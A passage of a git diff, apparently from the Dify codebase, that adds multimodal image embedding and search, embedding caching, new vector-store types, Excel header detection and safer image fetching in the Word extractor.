%s/%s (%s files)", i // batch_size + 1, total_batches, len(batch)) + + # Batch query all upload files to avoid N+1 queries + attachment_ids = [doc.metadata["doc_id"] for doc in batch] + stmt = select(UploadFile).where(UploadFile.id.in_(attachment_ids)) + upload_files = db.session.scalars(stmt).all() + upload_file_map = {str(f.id): f for f in upload_files} + + file_base64_list = [] + real_batch = [] + for document in batch: + attachment_id = document.metadata["doc_id"] + doc_type = document.metadata["doc_type"] + upload_file = upload_file_map.get(attachment_id) + if upload_file: + blob = storage.load_once(upload_file.key) + file_base64_str = base64.b64encode(blob).decode() + file_base64_list.append( + { + "content": file_base64_str, + "content_type": doc_type, + "file_id": attachment_id, + } + ) + real_batch.append(document) + batch_embeddings = self._embeddings.embed_multimodal_documents(file_base64_list) + logger.info( + "Embedding batch %s/%s took %s s", i // batch_size + 1, total_batches, time.time() - batch_start + ) + self._vector_processor.create(texts=real_batch, embeddings=batch_embeddings, **kwargs) + logger.info("Embedding %s files took %s s", len(file_documents), time.time() - start) + def add_texts(self, documents: list[Document], **kwargs): if kwargs.get("duplicate_check", False): documents = self._filter_duplicate_texts(documents) @@ -223,6 +272,22 @@ class Vector: query_vector = self._embeddings.embed_query(query) return self._vector_processor.search_by_vector(query_vector, **kwargs) + def search_by_file(self, file_id: str, **kwargs: Any) -> list[Document]: + upload_file: UploadFile 
| None = db.session.query(UploadFile).where(UploadFile.id == file_id).first() + + if not upload_file: + return [] + blob = storage.load_once(upload_file.key) + file_base64_str = base64.b64encode(blob).decode() + multimodal_vector = self._embeddings.embed_multimodal_query( + { + "content": file_base64_str, + "content_type": DocType.IMAGE, + "file_id": file_id, + } + ) + return self._vector_processor.search_by_vector(multimodal_vector, **kwargs) + def search_by_full_text(self, query: str, **kwargs: Any) -> list[Document]: return self._vector_processor.search_by_full_text(query, **kwargs) diff --git a/api/core/rag/datasource/vdb/vector_type.py b/api/core/rag/datasource/vdb/vector_type.py index bc7d93a2e0..bd99a31446 100644 --- a/api/core/rag/datasource/vdb/vector_type.py +++ b/api/core/rag/datasource/vdb/vector_type.py @@ -27,8 +27,10 @@ class VectorType(StrEnum): UPSTASH = "upstash" TIDB_ON_QDRANT = "tidb_on_qdrant" OCEANBASE = "oceanbase" + SEEKDB = "seekdb" OPENGAUSS = "opengauss" TABLESTORE = "tablestore" HUAWEI_CLOUD = "huawei_cloud" MATRIXONE = "matrixone" CLICKZETTA = "clickzetta" + IRIS = "iris" diff --git a/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py b/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py index 2c7bc592c0..84d1e26b34 100644 --- a/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py +++ b/api/core/rag/datasource/vdb/weaviate/weaviate_vector.py @@ -79,6 +79,18 @@ class WeaviateVector(BaseVector): self._client = self._init_client(config) self._attributes = attributes + def __del__(self): + """ + Destructor to properly close the Weaviate client connection. + Prevents connection leaks and resource warnings. + """ + if hasattr(self, "_client") and self._client is not None: + try: + self._client.close() + except Exception as e: + # Ignore errors during cleanup as object is being destroyed + logger.warning("Error closing Weaviate client %s", e, exc_info=True) + def _init_client(self, config: WeaviateConfig) -> weaviate.WeaviateClient: """ Initializes and returns a connected Weaviate client. 
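> Note: a minimal sketch of how the pieces above combine at query time — illustrative only; `dataset` stands for an existing multimodal-enabled `models.dataset.Dataset` row and `file_id` for a stored `UploadFile` id, neither of which is defined in this diff:

```python
from core.rag.datasource.vdb.vector_factory import Vector

def search_dataset_by_image(dataset, file_id: str):
    # Vector resolves the concrete store (e.g. VectorType.IRIS) from configuration.
    vector = Vector(dataset=dataset)
    # search_by_file loads the upload, embeds it via embed_multimodal_query,
    # then reuses the ordinary search_by_vector path with the resulting vector.
    return vector.search_by_file(
        file_id,
        top_k=4,
        score_threshold=0.0,
        filter={"group_id": [dataset.id]},
    )
```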
diff --git a/api/core/rag/docstore/dataset_docstore.py b/api/core/rag/docstore/dataset_docstore.py
index 74a2653e9d..1fe74d3042 100644
--- a/api/core/rag/docstore/dataset_docstore.py
+++ b/api/core/rag/docstore/dataset_docstore.py
@@ -5,9 +5,9 @@ from sqlalchemy import func, select
 
 from core.model_manager import ModelManager
 from core.model_runtime.entities.model_entities import ModelType
-from core.rag.models.document import Document
+from core.rag.models.document import AttachmentDocument, Document
 from extensions.ext_database import db
-from models.dataset import ChildChunk, Dataset, DocumentSegment
+from models.dataset import ChildChunk, Dataset, DocumentSegment, SegmentAttachmentBinding
 
 
 class DatasetDocumentStore:
@@ -120,6 +120,9 @@ class DatasetDocumentStore:
 
                 db.session.add(segment_document)
                 db.session.flush()
+                self.add_multimodel_documents_binding(
+                    segment_id=segment_document.id, multimodel_documents=doc.attachments
+                )
                 if save_child:
                     if doc.children:
                         for position, child in enumerate(doc.children, start=1):
@@ -144,6 +147,9 @@ class DatasetDocumentStore:
                 segment_document.index_node_hash = doc.metadata.get("doc_hash")
                 segment_document.word_count = len(doc.page_content)
                 segment_document.tokens = tokens
+                self.add_multimodel_documents_binding(
+                    segment_id=segment_document.id, multimodel_documents=doc.attachments
+                )
                 if save_child and doc.children:
                     # delete the existing child chunks
                     db.session.query(ChildChunk).where(
@@ -233,3 +239,15 @@ class DatasetDocumentStore:
         document_segment = db.session.scalar(stmt)
 
         return document_segment
+
+    def add_multimodel_documents_binding(self, segment_id: str, multimodel_documents: list[AttachmentDocument] | None):
+        if multimodel_documents:
+            for multimodel_document in multimodel_documents:
+                binding = SegmentAttachmentBinding(
+                    tenant_id=self._dataset.tenant_id,
+                    dataset_id=self._dataset.id,
+                    document_id=self._document_id,
+                    segment_id=segment_id,
+                    attachment_id=multimodel_document.metadata["doc_id"],
+                )
+                db.session.add(binding)
diff --git a/api/core/rag/embedding/cached_embedding.py b/api/core/rag/embedding/cached_embedding.py
index 7fb20c1941..3cbc7db75d 100644
--- a/api/core/rag/embedding/cached_embedding.py
+++ b/api/core/rag/embedding/cached_embedding.py
@@ -104,6 +104,88 @@ class CacheEmbedding(Embeddings):
 
         return text_embeddings
 
+    def embed_multimodal_documents(self, multimodel_documents: list[dict]) -> list[list[float]]:
+        """Embed multimodal (file) documents."""
+        # use doc embedding cache or store if not exists
+        multimodel_embeddings: list[Any] = [None for _ in range(len(multimodel_documents))]
+        embedding_queue_indices = []
+        for i, multimodel_document in enumerate(multimodel_documents):
+            file_id = multimodel_document["file_id"]
+            embedding = (
+                db.session.query(Embedding)
+                .filter_by(
+                    model_name=self._model_instance.model, hash=file_id, provider_name=self._model_instance.provider
+                )
+                .first()
+            )
+            if embedding:
+                multimodel_embeddings[i] = embedding.get_embedding()
+            else:
+                embedding_queue_indices.append(i)
+
+        # NOTE: avoid closing the shared scoped session here; downstream code may still have pending work
+
+        if embedding_queue_indices:
+            embedding_queue_multimodel_documents = [multimodel_documents[i] for i in embedding_queue_indices]
+            embedding_queue_embeddings = []
+            try:
+                model_type_instance = cast(TextEmbeddingModel, self._model_instance.model_type_instance)
+                model_schema = model_type_instance.get_model_schema(
+                    self._model_instance.model, self._model_instance.credentials
+                )
+                max_chunks = (
+                    model_schema.model_properties[ModelPropertyKey.MAX_CHUNKS]
+                    if model_schema and ModelPropertyKey.MAX_CHUNKS in model_schema.model_properties
+                    else 1
+                )
+                for i in range(0, len(embedding_queue_multimodel_documents), max_chunks):
+                    batch_multimodel_documents = embedding_queue_multimodel_documents[i : i + max_chunks]
+
+                    embedding_result = self._model_instance.invoke_multimodal_embedding(
+                        multimodel_documents=batch_multimodel_documents,
+                        user=self._user,
+                        input_type=EmbeddingInputType.DOCUMENT,
+                    )
+
+                    for vector in embedding_result.embeddings:
+                        try:
+                            # FIXME: type ignore for numpy here
+                            normalized_embedding = (vector / np.linalg.norm(vector)).tolist()  # type: ignore
+                            # stackoverflow best way: https://stackoverflow.com/questions/20319813/how-to-check-list-containing-nan
+                            if np.isnan(normalized_embedding).any():
+                                # for issue #11827 float values are not json compliant
+                                logger.warning("Normalized embedding is nan: %s", normalized_embedding)
+                                continue
+                            embedding_queue_embeddings.append(normalized_embedding)
+                        except IntegrityError:
+                            db.session.rollback()
+                        except Exception:
+                            logger.exception("Failed to transform embedding")
+                cache_embeddings = []
+                try:
+                    for i, n_embedding in zip(embedding_queue_indices, embedding_queue_embeddings):
+                        multimodel_embeddings[i] = n_embedding
+                        file_id = multimodel_documents[i]["file_id"]
+                        if file_id not in cache_embeddings:
+                            embedding_cache = Embedding(
+                                model_name=self._model_instance.model,
+                                hash=file_id,
+                                provider_name=self._model_instance.provider,
+                            )
+                            embedding_cache.set_embedding(n_embedding)
+                            db.session.add(embedding_cache)
+                            cache_embeddings.append(file_id)
+                    db.session.commit()
+                except IntegrityError:
+                    db.session.rollback()
+            except Exception as ex:
+                db.session.rollback()
+                logger.exception("Failed to embed documents")
+                raise ex
+
+        return multimodel_embeddings
+
     def embed_query(self, text: str) -> list[float]:
         """Embed query text."""
         # use doc embedding cache or store if not exists
@@ -146,3 +228,46 @@ class CacheEmbedding(Embeddings):
             raise ex
 
         return embedding_results  # type: ignore
+
+    def embed_multimodal_query(self, multimodel_document: dict) -> list[float]:
+        """Embed a multimodal query document."""
+        # use doc embedding cache or store if not exists
+        file_id = multimodel_document["file_id"]
+        embedding_cache_key = f"{self._model_instance.provider}_{self._model_instance.model}_{file_id}"
+        embedding = redis_client.get(embedding_cache_key)
+        if embedding:
+            redis_client.expire(embedding_cache_key, 600)
+            decoded_embedding = np.frombuffer(base64.b64decode(embedding), dtype="float")
+            return [float(x) for x in decoded_embedding]
+        try:
+            embedding_result = self._model_instance.invoke_multimodal_embedding(
+                multimodel_documents=[multimodel_document], user=self._user, input_type=EmbeddingInputType.QUERY
+            )
+
+            embedding_results = embedding_result.embeddings[0]
+            # FIXME: type ignore for numpy here
+            embedding_results = (embedding_results / np.linalg.norm(embedding_results)).tolist()  # type: ignore
+            if np.isnan(embedding_results).any():
+                raise ValueError("Normalized embedding is nan please try again")
+        except Exception as ex:
+            if dify_config.DEBUG:
+                logger.exception("Failed to embed multimodal document '%s'", multimodel_document["file_id"])
+            raise ex
+
+        try:
+            # encode embedding to base64
+            embedding_vector = np.array(embedding_results)
+            vector_bytes = embedding_vector.tobytes()
+            # Transform to Base64
+            encoded_vector = base64.b64encode(vector_bytes)
+            # Transform to string
+            encoded_str = encoded_vector.decode("utf-8")
+            redis_client.setex(embedding_cache_key, 600, encoded_str)
+        except Exception as ex:
+            if dify_config.DEBUG:
+                logger.exception(
+                    "Failed to add embedding to redis for the multimodal document '%s'", multimodel_document["file_id"]
+                )
+            raise ex
+
+        return embedding_results  # type: ignore
diff --git a/api/core/rag/embedding/embedding_base.py b/api/core/rag/embedding/embedding_base.py
index 9f232ab910..1be55bda80 100644
--- a/api/core/rag/embedding/embedding_base.py
+++ b/api/core/rag/embedding/embedding_base.py
@@ -9,11 +9,21 @@ class Embeddings(ABC):
         """Embed search docs."""
         raise NotImplementedError
 
+    @abstractmethod
+    def embed_multimodal_documents(self, multimodel_documents: list[dict]) -> list[list[float]]:
+        """Embed multimodal (file) documents."""
+        raise NotImplementedError
+
     @abstractmethod
     def embed_query(self, text: str) -> list[float]:
         """Embed query text."""
         raise NotImplementedError
 
+    @abstractmethod
+    def embed_multimodal_query(self, multimodel_document: dict) -> list[float]:
+        """Embed multimodal query."""
+        raise NotImplementedError
+
     async def aembed_documents(self, texts: list[str]) -> list[list[float]]:
         """Asynchronous Embed search docs."""
         raise NotImplementedError
diff --git a/api/core/rag/embedding/retrieval.py b/api/core/rag/embedding/retrieval.py
index 8e92191568..b54a37b49e 100644
--- a/api/core/rag/embedding/retrieval.py
+++ b/api/core/rag/embedding/retrieval.py
@@ -19,3 +19,4 @@ class RetrievalSegments(BaseModel):
     segment: DocumentSegment
     child_chunks: list[RetrievalChildChunk] | None = None
     score: float | None = None
+    files: list[dict[str, str | int]] | None = None
diff --git a/api/core/rag/entities/citation_metadata.py b/api/core/rag/entities/citation_metadata.py
index aca879df7d..9f66cd9a03 100644
--- a/api/core/rag/entities/citation_metadata.py
+++ b/api/core/rag/entities/citation_metadata.py
@@ -21,3 +21,4 @@ class RetrievalSourceMetadata(BaseModel):
     page: int | None = None
     doc_metadata: dict[str, Any] | None = None
     title: str | None = None
+    files: list[dict[str, Any]] | None = None
diff --git a/api/core/rag/extractor/entity/extract_setting.py b/api/core/rag/extractor/entity/extract_setting.py
index c3bfbce98f..0c42034073 100644
--- a/api/core/rag/extractor/entity/extract_setting.py
+++ b/api/core/rag/extractor/entity/extract_setting.py
@@ -10,7 +10,7 @@ class NotionInfo(BaseModel):
     """
 
     credential_id: str | None = None
-    notion_workspace_id: str
+    notion_workspace_id: str | None = ""
     notion_obj_id: str
     notion_page_type: str
     document: Document | None = None
diff --git a/api/core/rag/extractor/excel_extractor.py b/api/core/rag/extractor/excel_extractor.py
index ea9c6bd73a..875bfd1439 100644
--- a/api/core/rag/extractor/excel_extractor.py
+++ b/api/core/rag/extractor/excel_extractor.py
@@ -1,7 +1,7 @@
 """Abstract interface for document loader implementations."""
 
 import os
-from typing import cast
+from typing import TypedDict
 
 import pandas as pd
 from openpyxl import load_workbook
@@ -10,6 +10,12 @@ from core.rag.extractor.extractor_base import BaseExtractor
 from core.rag.models.document import Document
 
 
+class Candidate(TypedDict):
+    idx: int
+    count: int
+    map: dict[int, str]
+
+
 class ExcelExtractor(BaseExtractor):
     """Load Excel files.
@@ -30,32 +36,38 @@ class ExcelExtractor(BaseExtractor):
         file_extension = os.path.splitext(self._file_path)[-1].lower()
 
         if file_extension == ".xlsx":
-            wb = load_workbook(self._file_path, data_only=True)
-            for sheet_name in wb.sheetnames:
-                sheet = wb[sheet_name]
-                data = sheet.values
-                cols = next(data, None)
-                if cols is None:
-                    continue
-                df = pd.DataFrame(data, columns=cols)
-
-                df.dropna(how="all", inplace=True)
-
-                for index, row in df.iterrows():
-                    page_content = []
-                    for col_index, (k, v) in enumerate(row.items()):
-                        if pd.notna(v):
-                            cell = sheet.cell(
-                                row=cast(int, index) + 2, column=col_index + 1
-                            )  # +2 to account for header and 1-based index
-                            if cell.hyperlink:
-                                value = f"[{v}]({cell.hyperlink.target})"
-                                page_content.append(f'"{k}":"{value}"')
-                            else:
-                                page_content.append(f'"{k}":"{v}"')
-                    documents.append(
-                        Document(page_content=";".join(page_content), metadata={"source": self._file_path})
-                    )
+            wb = load_workbook(self._file_path, read_only=True, data_only=True)
+            try:
+                for sheet_name in wb.sheetnames:
+                    sheet = wb[sheet_name]
+                    header_row_idx, column_map, max_col_idx = self._find_header_and_columns(sheet)
+                    if not column_map:
+                        continue
+                    start_row = header_row_idx + 1
+                    for row in sheet.iter_rows(min_row=start_row, max_col=max_col_idx, values_only=False):
+                        if all(cell.value is None for cell in row):
+                            continue
+                        page_content = []
+                        for col_idx, cell in enumerate(row):
+                            value = cell.value
+                            if col_idx in column_map:
+                                col_name = column_map[col_idx]
+                                if hasattr(cell, "hyperlink") and cell.hyperlink:
+                                    target = getattr(cell.hyperlink, "target", None)
+                                    if target:
+                                        value = f"[{value}]({target})"
+                                if value is None:
+                                    value = ""
+                                elif not isinstance(value, str):
+                                    value = str(value)
+                                value = value.strip().replace('"', '\\"')
+                                page_content.append(f'"{col_name}":"{value}"')
+                        if page_content:
+                            documents.append(
+                                Document(page_content=";".join(page_content), metadata={"source": self._file_path})
+                            )
+            finally:
+                wb.close()
 
         elif file_extension == ".xls":
             excel_file = pd.ExcelFile(self._file_path, engine="xlrd")
@@ -63,9 +75,9 @@ class ExcelExtractor(BaseExtractor):
                 df = excel_file.parse(sheet_name=excel_sheet_name)
                 df.dropna(how="all", inplace=True)
 
-                for _, row in df.iterrows():
+                for _, series_row in df.iterrows():
                     page_content = []
-                    for k, v in row.items():
+                    for k, v in series_row.items():
                         if pd.notna(v):
                             page_content.append(f'"{k}":"{v}"')
                     documents.append(
@@ -75,3 +87,61 @@ class ExcelExtractor(BaseExtractor):
             raise ValueError(f"Unsupported file extension: {file_extension}")
 
         return documents
+
+    def _find_header_and_columns(self, sheet, scan_rows=10) -> tuple[int, dict[int, str], int]:
+        """
+        Scan first N rows to find the most likely header row.
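+
+        A row qualifies as the header once it contains at least two non-empty cells;
+        otherwise the densest scanned row wins, with ties going to the earlier row.
+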
+ Returns: + header_row_idx: 1-based index of the header row + column_map: Dict mapping 0-based column index to column name + max_col_idx: 1-based index of the last valid column (for iter_rows boundary) + """ + # Store potential candidates: (row_index, non_empty_count, column_map) + candidates: list[Candidate] = [] + + # Limit scan to avoid performance issues on huge files + # We iterate manually to control the read scope + for current_row_idx, row in enumerate(sheet.iter_rows(min_row=1, max_row=scan_rows, values_only=True), start=1): + # Filter out empty cells and build a temp map for this row + # col_idx is 0-based + row_map = {} + for col_idx, cell_value in enumerate(row): + if cell_value is not None and str(cell_value).strip(): + row_map[col_idx] = str(cell_value).strip().replace('"', '\\"') + + if not row_map: + continue + + non_empty_count = len(row_map) + + # Header selection heuristic (implemented): + # - Prefer the first row with at least 2 non-empty columns. + # - Fallback: choose the row with the most non-empty columns + # (tie-breaker: smaller row index). + candidates.append({"idx": current_row_idx, "count": non_empty_count, "map": row_map}) + + if not candidates: + return 0, {}, 0 + + # Choose the best candidate header row. + + best_candidate: Candidate | None = None + + # Strategy: prefer the first row with >= 2 non-empty columns; otherwise fallback. + + for cand in candidates: + if cand["count"] >= 2: + best_candidate = cand + break + + # Fallback: if no row has >= 2 columns, or all have 1, just take the one with max columns + if not best_candidate: + # Sort by count desc, then index asc + candidates.sort(key=lambda x: (-x["count"], x["idx"])) + best_candidate = candidates[0] + + # Determine max_col_idx (1-based for openpyxl) + # It is the index of the last valid column in our map + 1 + max_col_idx = max(best_candidate["map"].keys()) + 1 + + return best_candidate["idx"], best_candidate["map"], max_col_idx diff --git a/api/core/rag/extractor/extract_processor.py b/api/core/rag/extractor/extract_processor.py index 0f62f9c4b6..013c287248 100644 --- a/api/core/rag/extractor/extract_processor.py +++ b/api/core/rag/extractor/extract_processor.py @@ -166,7 +166,7 @@ class ExtractProcessor: elif extract_setting.datasource_type == DatasourceType.NOTION: assert extract_setting.notion_info is not None, "notion_info is required" extractor = NotionExtractor( - notion_workspace_id=extract_setting.notion_info.notion_workspace_id, + notion_workspace_id=extract_setting.notion_info.notion_workspace_id or "", notion_obj_id=extract_setting.notion_info.notion_obj_id, notion_page_type=extract_setting.notion_info.notion_page_type, document_model=extract_setting.notion_info.document, diff --git a/api/core/rag/extractor/helpers.py b/api/core/rag/extractor/helpers.py index 5166c0c768..5b466b281c 100644 --- a/api/core/rag/extractor/helpers.py +++ b/api/core/rag/extractor/helpers.py @@ -45,6 +45,6 @@ def detect_file_encodings(file_path: str, timeout: int = 5, sample_size: int = 1 except concurrent.futures.TimeoutError: raise TimeoutError(f"Timeout reached while detecting encoding for {file_path}") - if all(encoding["encoding"] is None for encoding in encodings): + if all(encoding.encoding is None for encoding in encodings): raise RuntimeError(f"Could not detect encoding for {file_path}") - return [FileEncoding(**enc) for enc in encodings if enc["encoding"] is not None] + return [enc for enc in encodings if enc.encoding is not None] diff --git a/api/core/rag/extractor/word_extractor.py 
b/api/core/rag/extractor/word_extractor.py index c7a5568866..f67f613e9d 100644 --- a/api/core/rag/extractor/word_extractor.py +++ b/api/core/rag/extractor/word_extractor.py @@ -83,23 +83,46 @@ class WordExtractor(BaseExtractor): def _extract_images_from_docx(self, doc): image_count = 0 image_map = {} + base_url = dify_config.INTERNAL_FILES_URL or dify_config.FILES_URL - for rel in doc.part.rels.values(): + for r_id, rel in doc.part.rels.items(): if "image" in rel.target_ref: image_count += 1 if rel.is_external: url = rel.target_ref - response = ssrf_proxy.get(url) + if not self._is_valid_url(url): + continue + try: + response = ssrf_proxy.get(url) + except Exception as e: + logger.warning("Failed to download image from URL: %s: %s", url, str(e)) + continue if response.status_code == 200: - image_ext = mimetypes.guess_extension(response.headers["Content-Type"]) + image_ext = mimetypes.guess_extension(response.headers.get("Content-Type", "")) if image_ext is None: continue file_uuid = str(uuid.uuid4()) - file_key = "image_files/" + self.tenant_id + "/" + file_uuid + "." + image_ext + file_key = "image_files/" + self.tenant_id + "/" + file_uuid + image_ext mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, response.content) - else: - continue + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + image_map[r_id] = f"![image]({base_url}/files/{upload_file.id}/file-preview)" else: image_ext = rel.target_ref.split(".")[-1] if image_ext is None: @@ -110,27 +133,25 @@ class WordExtractor(BaseExtractor): mime_type, _ = mimetypes.guess_type(file_key) storage.save(file_key, rel.target_part.blob) - # save file to db - upload_file = UploadFile( - tenant_id=self.tenant_id, - storage_type=dify_config.STORAGE_TYPE, - key=file_key, - name=file_key, - size=0, - extension=str(image_ext), - mime_type=mime_type or "", - created_by=self.user_id, - created_by_role=CreatorUserRole.ACCOUNT, - created_at=naive_utc_now(), - used=True, - used_by=self.user_id, - used_at=naive_utc_now(), - ) - - db.session.add(upload_file) - db.session.commit() - image_map[rel.target_part] = f"![image]({dify_config.FILES_URL}/files/{upload_file.id}/file-preview)" - + # save file to db + upload_file = UploadFile( + tenant_id=self.tenant_id, + storage_type=dify_config.STORAGE_TYPE, + key=file_key, + name=file_key, + size=0, + extension=str(image_ext), + mime_type=mime_type or "", + created_by=self.user_id, + created_by_role=CreatorUserRole.ACCOUNT, + created_at=naive_utc_now(), + used=True, + used_by=self.user_id, + used_at=naive_utc_now(), + ) + db.session.add(upload_file) + image_map[rel.target_part] = f"![image]({base_url}/files/{upload_file.id}/file-preview)" + db.session.commit() return image_map def _table_to_markdown(self, table, image_map): @@ -186,11 +207,17 @@ class WordExtractor(BaseExtractor): image_id = blip.get("{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed") if not image_id: continue - image_part = paragraph.part.rels[image_id].target_part - - if image_part in image_map: - image_link = image_map[image_part] - paragraph_content.append(image_link) + rel = paragraph.part.rels.get(image_id) + if rel is None: + continue + # 
For external images, use image_id as key; for internal, use target_part + if rel.is_external: + if image_id in image_map: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map: + paragraph_content.append(image_map[image_part]) else: paragraph_content.append(run.text) return "".join(paragraph_content).strip() @@ -227,6 +254,18 @@ class WordExtractor(BaseExtractor): def parse_paragraph(paragraph): paragraph_content = [] + + def append_image_link(image_id, has_drawing): + """Helper to append image link from image_map based on relationship type.""" + rel = doc.part.rels[image_id] + if rel.is_external: + if image_id in image_map and not has_drawing: + paragraph_content.append(image_map[image_id]) + else: + image_part = rel.target_part + if image_part in image_map and not has_drawing: + paragraph_content.append(image_map[image_part]) + for run in paragraph.runs: if hasattr(run.element, "tag") and isinstance(run.element.tag, str) and run.element.tag.endswith("r"): # Process drawing type images @@ -243,10 +282,18 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}embed" ) if embed_id: - image_part = doc.part.related_parts.get(embed_id) - if image_part in image_map: - has_drawing = True - paragraph_content.append(image_map[image_part]) + rel = doc.part.rels.get(embed_id) + if rel is not None and rel.is_external: + # External image: use embed_id as key + if embed_id in image_map: + has_drawing = True + paragraph_content.append(image_map[embed_id]) + else: + # Internal image: use target_part as key + image_part = doc.part.related_parts.get(embed_id) + if image_part in image_map: + has_drawing = True + paragraph_content.append(image_map[image_part]) # Process pict type images shape_elements = run.element.findall( ".//{http://schemas.openxmlformats.org/wordprocessingml/2006/main}pict" @@ -261,9 +308,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) # Find imagedata element in VML image_data = shape.find(".//{urn:schemas-microsoft-com:vml}imagedata") if image_data is not None: @@ -271,9 +316,7 @@ class WordExtractor(BaseExtractor): "{http://schemas.openxmlformats.org/officeDocument/2006/relationships}id" ) if image_id and image_id in doc.part.rels: - image_part = doc.part.rels[image_id].target_part - if image_part in image_map and not has_drawing: - paragraph_content.append(image_map[image_part]) + append_image_link(image_id, has_drawing) if run.text.strip(): paragraph_content.append(run.text.strip()) return "".join(paragraph_content) if paragraph_content else "" diff --git a/api/core/rag/index_processor/constant/built_in_field.py b/api/core/rag/index_processor/constant/built_in_field.py index 9ad69e7fe3..7c270a32d0 100644 --- a/api/core/rag/index_processor/constant/built_in_field.py +++ b/api/core/rag/index_processor/constant/built_in_field.py @@ -15,3 +15,4 @@ class MetadataDataSource(StrEnum): notion_import = "notion" local_file = "file_upload" online_document = "online_document" + online_drive = "online_drive" diff --git a/api/core/rag/index_processor/constant/doc_type.py b/api/core/rag/index_processor/constant/doc_type.py new file mode 100644 index 0000000000..93c8fecb8d --- 
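A subtlety in the word-extractor change above: `image_map` now carries two kinds of keys, the relationship id (`r_id`) for external images and the target part object for embedded ones, so every lookup has to branch on `rel.is_external`. A hedged sketch of that lookup; the `Rel` class is a hypothetical stand-in for the relationship objects python-docx supplies:

```python
class Rel:
    """Hypothetical stand-in for a python-docx relationship object."""
    def __init__(self, is_external: bool, target_part=None):
        self.is_external = is_external
        self.target_part = target_part


def resolve_image_link(image_map: dict, rels: dict, image_id: str) -> str | None:
    # External images are keyed by relationship id; embedded ones by target part.
    rel = rels.get(image_id)
    if rel is None:
        return None
    key = image_id if rel.is_external else rel.target_part
    return image_map.get(key)


part = object()  # stands in for an embedded image part
rels = {"rId7": Rel(False, part), "rId9": Rel(True)}
link = "![image](https://files.example/abc/file-preview)"  # hypothetical URL
image_map = {part: link, "rId9": link}
assert resolve_image_link(image_map, rels, "rId7") == link
assert resolve_image_link(image_map, rels, "rId9") == link
```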
/dev/null +++ b/api/core/rag/index_processor/constant/doc_type.py @@ -0,0 +1,6 @@ +from enum import StrEnum + + +class DocType(StrEnum): + TEXT = "text" + IMAGE = "image" diff --git a/api/core/rag/index_processor/constant/index_type.py b/api/core/rag/index_processor/constant/index_type.py index 659086e808..09617413f7 100644 --- a/api/core/rag/index_processor/constant/index_type.py +++ b/api/core/rag/index_processor/constant/index_type.py @@ -1,7 +1,12 @@ from enum import StrEnum -class IndexType(StrEnum): +class IndexStructureType(StrEnum): PARAGRAPH_INDEX = "text_model" QA_INDEX = "qa_model" PARENT_CHILD_INDEX = "hierarchical_model" + + +class IndexTechniqueType(StrEnum): + ECONOMY = "economy" + HIGH_QUALITY = "high_quality" diff --git a/api/core/rag/index_processor/constant/query_type.py b/api/core/rag/index_processor/constant/query_type.py new file mode 100644 index 0000000000..342bfef3f7 --- /dev/null +++ b/api/core/rag/index_processor/constant/query_type.py @@ -0,0 +1,6 @@ +from enum import StrEnum + + +class QueryType(StrEnum): + TEXT_QUERY = "text_query" + IMAGE_QUERY = "image_query" diff --git a/api/core/rag/index_processor/index_processor_base.py b/api/core/rag/index_processor/index_processor_base.py index d4eff53204..8a28eb477a 100644 --- a/api/core/rag/index_processor/index_processor_base.py +++ b/api/core/rag/index_processor/index_processor_base.py @@ -1,20 +1,34 @@ """Abstract interface for document loader implementations.""" +import cgi +import logging +import mimetypes +import os +import re from abc import ABC, abstractmethod from collections.abc import Mapping from typing import TYPE_CHECKING, Any, Optional +from urllib.parse import unquote, urlparse + +import httpx from configs import dify_config +from core.helper import ssrf_proxy from core.rag.extractor.entity.extract_setting import ExtractSetting -from core.rag.models.document import Document +from core.rag.index_processor.constant.doc_type import DocType +from core.rag.models.document import AttachmentDocument, Document from core.rag.retrieval.retrieval_methods import RetrievalMethod from core.rag.splitter.fixed_text_splitter import ( EnhanceRecursiveCharacterTextSplitter, FixedRecursiveCharacterTextSplitter, ) from core.rag.splitter.text_splitter import TextSplitter +from extensions.ext_database import db +from extensions.ext_storage import storage +from models import Account, ToolFile from models.dataset import Dataset, DatasetProcessRule from models.dataset import Document as DatasetDocument +from models.model import UploadFile if TYPE_CHECKING: from core.model_manager import ModelInstance @@ -28,11 +42,18 @@ class BaseIndexProcessor(ABC): raise NotImplementedError @abstractmethod - def transform(self, documents: list[Document], **kwargs) -> list[Document]: + def transform(self, documents: list[Document], current_user: Account | None = None, **kwargs) -> list[Document]: raise NotImplementedError @abstractmethod - def load(self, dataset: Dataset, documents: list[Document], with_keywords: bool = True, **kwargs): + def load( + self, + dataset: Dataset, + documents: list[Document], + multimodal_documents: list[AttachmentDocument] | None = None, + with_keywords: bool = True, + **kwargs, + ): raise NotImplementedError @abstractmethod @@ -96,3 +117,178 @@ class BaseIndexProcessor(ABC): ) return character_splitter # type: ignore + + def _get_content_files(self, document: Document, current_user: Account | None = None) -> list[AttachmentDocument]: + """ + Get the content files from the document. 
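`DocType`, `QueryType`, and the renamed index-type enums are all `StrEnum`s, so members compare and serialize as plain strings and round-trip through metadata dicts and API payloads without casting. A small usage sketch, assuming Python 3.11+ where `enum.StrEnum` exists (the enum is redeclared here only to keep the sketch self-contained):

```python
from enum import StrEnum  # Python 3.11+


class DocType(StrEnum):
    TEXT = "text"
    IMAGE = "image"


metadata = {"doc_type": DocType.IMAGE}
assert metadata["doc_type"] == "image"                 # compares as a plain string
assert DocType(metadata["doc_type"]) is DocType.IMAGE  # and parses back losslessly
```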
